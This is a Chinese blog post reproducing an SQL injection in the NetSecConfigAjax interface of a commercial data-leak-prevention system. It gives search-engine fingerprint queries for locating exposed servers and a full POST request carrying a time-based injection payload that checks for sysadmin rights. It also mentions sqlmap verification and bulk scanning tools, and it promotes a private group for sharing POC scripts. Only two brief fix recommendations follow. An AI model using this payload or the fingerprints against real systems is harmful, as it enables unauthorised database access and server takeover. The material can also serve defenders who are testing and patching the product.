【漏洞复现】某赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL注入漏洞

已于 2024-08-08 10:55:17 修改
阅读量144 收藏
点赞数 9
分类专栏: 漏洞复现篇 文章标签: sql DLP
于 2024-08-08 10:15:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/141019294
版权

0x01 产品简介

某赛通新一代数据泄露防护系统(简称 DLP),以服务企事业单位进行数据资产梳理、数据安全防护为目标。系统采用平台化管理,将终端DLP、网络DLP、邮件DLP、存储扫描DLP、API 接口DLP 进行统一管理,模块化控制。将对数据进行分类分级扫描,实现终端数据资产梳理、文件服务器数据梳理、数据库数据资产梳理、数据加密防护、数据外发监测、终端运维管理、邮件外发控制、数据水印、端口管控。

0x02 漏洞概述

某赛通数据泄露防护(DLP)系统NetSecConfigAjax接口处存在sql注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 搜索引擎

body="CDGServer3" || title="电子文档安全管理系统" || cert="esafenet" || body="/help/getEditionInfo.jsp" || body="/CDGServer3/index.jsp"

在这里插入图片描述

0x04 漏洞复现

POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=BFFA734FFFC1D940FA2710CD18F4CA23
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:10'--

在这里插入图片描述
sqlmap验证
在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

1、关闭互联网暴露面或接口设置访问权限
2、升级至安全版本

SuperherRo
关注
  • 9
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
某赛电子文档安全管理系统 PolicyAjax SQL注入漏洞复现
0xSec
01-31 990
由于某赛电子文档安全管理系统PolicyAjax处的id参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
某赛电子文档安全管理系统 NavigationAjax SQL注入漏洞复现
0xSec
04-25 555
由于某赛电子文档安全管理系统NavigationAjax接口的id参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
某赛电子文档安全管理系统 多处 SQL注入漏洞复现
0xSec
04-26 1803
某赛电子文档安全管理系统存在多处SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库敏感信息,进一步利用可获取服务器权限。
某赛电子文档安全管理系统 UploadFileToCatalog SQL注入漏洞复现
0xSec
02-02 835
由于某赛电子文档安全管理系统UploadFileToCatalog接口的id参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
0day!!忆赛某接口存在SQL注入漏洞(大量资产存在)-新接口
weixin_43167326的博客
03-12 560
此电子文档安全管理系统是一套专业的文档安全管理解决方案。它提供了多层次的保护措施,确保用户的电子文档在存储、传输和使用过程中的安全性。此系统某接口存在SQL注入漏洞
针对被易赛数据泄露防护客户端加密的文件的解密思路
01-06
针对被易赛数据泄露防护客户端加密的文件的解密思路 本文主要讨论了如何对被易赛数据泄露防护客户端加密的文件进行解密的思路。由于工作中需要处理敏感数据,公司要求电脑上必须安装易赛数据泄露防护客户端,...
钓赛-钓鱼比赛计分软件系统
10-21
钓赛-是一个全平台的钓鱼比赛计分排名软件(公益项目,永久免费)。共支持(安卓手机,苹果手机,IPad,电脑PC,微信小程序)它功能强大,使用方便。 从钓鱼比赛的报名,比赛签到,比赛抽签,比赛成绩计分,比赛排名...
PyPore:用于分析基于纳米Kong的实验数据的工具
06-27
Kong纳米Kong数据分析PyPore 包基于一些核心数据分析包,以便为处理 UCSC 纳米Kong实验室中的纳米Kong数据提供一致且简单的框架。 它需要的包是: 麻木的scipy matplotlib 学习不需要但可以使用的软件包是: 数据库...
matlab中云滴代码-AMF:用于在线QoS预测的自适应矩阵分解
06-02
分布式计算系统国际会议 (ICDCS) ,2014 年。 依赖关系 Python 2.7 () 赛 0.20.1 () 麻木 1.8.1 () scipy 0.13.3 () 版本 该 repo 在不同的分支中维护了三个版本的 AMF: :python中的当前优化版本 : ICDCS'2014 ...
ising_model:使用 Metropolis 算法对 Ising 模型进行 2D 模拟。 “动态和扩展系统”课程练习@坎塔布里亚大学(西班牙语)。 使用 Cython 库与 Python 接口的 C++11 实现
06-01
麻木的 matplotlib 克隆存储库 git clone https://github.com/pablodecm/ising_model.git 编译和链接模拟器 Ising 2D 模拟器是用 C++ 实现的,并使用 Cython 链接,需要一个 C+11 兼容的编译器。 要将扩展编译...
索引的艺术:SQL Server数据库性能优化的索引设计策略
2401_85761762的博客
08-04 538
本文将深入探讨SQL Server中数据库性能优化时需要考虑的索引设计因素,带你领略索引设计的智慧。过本文的深入分析和实践指导,我们不仅理解了索引设计的重要性,还学会了如何一步步构建和实施索引策略。过本文的详细介绍,你应该已经掌握了如何选择合适的索引类型、列,设计复合索引,以及如何维护和监控索引。随着实践经验的积累,你将能够更加熟练地设计和优化索引,确保你的数据库在各种查询条件下都能表现出色。包含列的索引可以提高查询性能,尤其是当查询中包含多个非索引列时。不同的查询模式可能需要不同的索引策略。
postgresql 双重排序后 重复项 标识次序
cuisidong1997的博客
08-04 205
在这个查询中,ROW_NUMBER()会为每个product_id分组内的行分配一个唯一的sale_sequence。PARTITION BY product_id表示按product_id分组,ORDER BY sale_date表示在每个分组内按sale_date排序。最外层的ORDER BY product_id, sale_date确定了查询结果的最终排序。一个常见的方法是使用ROW_NUMBER()窗口函数,它会为每个分组内的行分配一个唯一的序号。
postgresql 分组合并 字段
cuisidong1997的博客
08-04 248
如果你想要合并的不是字符串字段,而是其他类型的字段,比如数字或日期,你也可以使用string_agg,但是需要将这些值转换为字符串。在PostgreSQL中,如果你想要将多个行的字段值合并为一个字段,你可以使用string_agg函数。这个函数可以将同一个组内的指定字段的值连接成一个字符串,并且可以自定义连接符。在这个例子中,array_agg将所有的薪资值收集到一个数组中,然后array_to_string将这个数组转换为一个由逗号分隔的字符串。postgresql 分组合并 字段。
SQL Server数据库文件过大而无法直接导出解决方案
战族狼魂的博客
08-04 264
有些第三方工具可以提供更加灵活和高效的备份和恢复功能,例如Redgate的SQL Backup,Idera的SQL Safe Backup等。如果数据库使用了文件组,则可以备份单个文件组或单个数据文件。这种方式可以让你在需要恢复时,只恢复特定的文件组或文件。SQL Server支持压缩备份,压缩后的备份文件会更小,从而减少了单个备份文件的大小。部分备份是一种备份数据库子集的方法,特别适用于具有只读文件组的大型数据库。这样,数据库的备份将被分割成多个部分存储在不同的文件中。
dbeaver 导入sql 报错,ERROR 2059 (HY000)
hyq_07_27的博客
08-07 129
ERROR 2059 (HY000): Authentication plugin ‘caching_sha2_password’ cannot be loaded: 鎵句笉鍒版寚瀹氱殑妯″潡銆�。下载后解压压缩包,点击“添加数据库地址”按钮,选择新的MySQL8的所在目录.再次导入就可以了。可以下载 MySQL免安装版配置教程mysql-8.0.39-winx64.zip。先mysql连接设置,查看一下dbeaver的mysql 版本,是5.5.62.版本问题,MySQL8之后更换了密码认证策略。
MyBatis 如何过拦截器修改 SQL
Hello World
08-03 413
假如我们想实现多租户,或者在某些 SQL 后面自动拼接查询条件。在开发过程中大部分场景可能都是一个查询写一个 SQL 去处理,我们如果想修改最终 SQL 可以过修改各个 mapper.xml 中的 SQL 来处理。但实际过程中我们可能穿插着 ORM 和 SQL 的混合使用,隐藏在代码中不容易被发现,还有假如项目中有很多很多的 SQL 我们不可能一个一个的去修改解决。这个时候我们就需要过 mybatis 拦截 SQL 并且最终修改 SQL。实现Interceptor接口,并写相关逻辑。
C++ SQL ORM
最新发布
一个大佬的博客
08-07 360
【代码】C++ SQL ORM。
PostgreSQL设置主键递增
y516369的博客
08-04 135
PostgreSQL设置主键递增
亿赛加密的文件如何解密
06-10
亿赛(Esaton)是一种国产加密软件,用于加密文件、磁盘、分区等。如果您想要解密亿赛加密的文件,需要使用亿赛加密软件进行解密。 具体操作步骤如下: 1. 首先,您需要安装亿赛加密软件,并打开软件。 2. 在软件界面上,选择“解密文件”功能。 3. 在解密文件界面上,点击“选择文件”按钮,选择您需要解密的文件。 4. 输入正确的解密密码,点击“解密”按钮。 5. 等待解密完成,解密完成后,您可以在指定的解密路径下找到解密后的文件。 需要注意的是,亿赛加密软件的加密算法比较强,如果您忘记了解密密码,那么就无法解密文件。因此,在使用亿赛加密软件加密文件时,一定要妥善保管好解密密码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值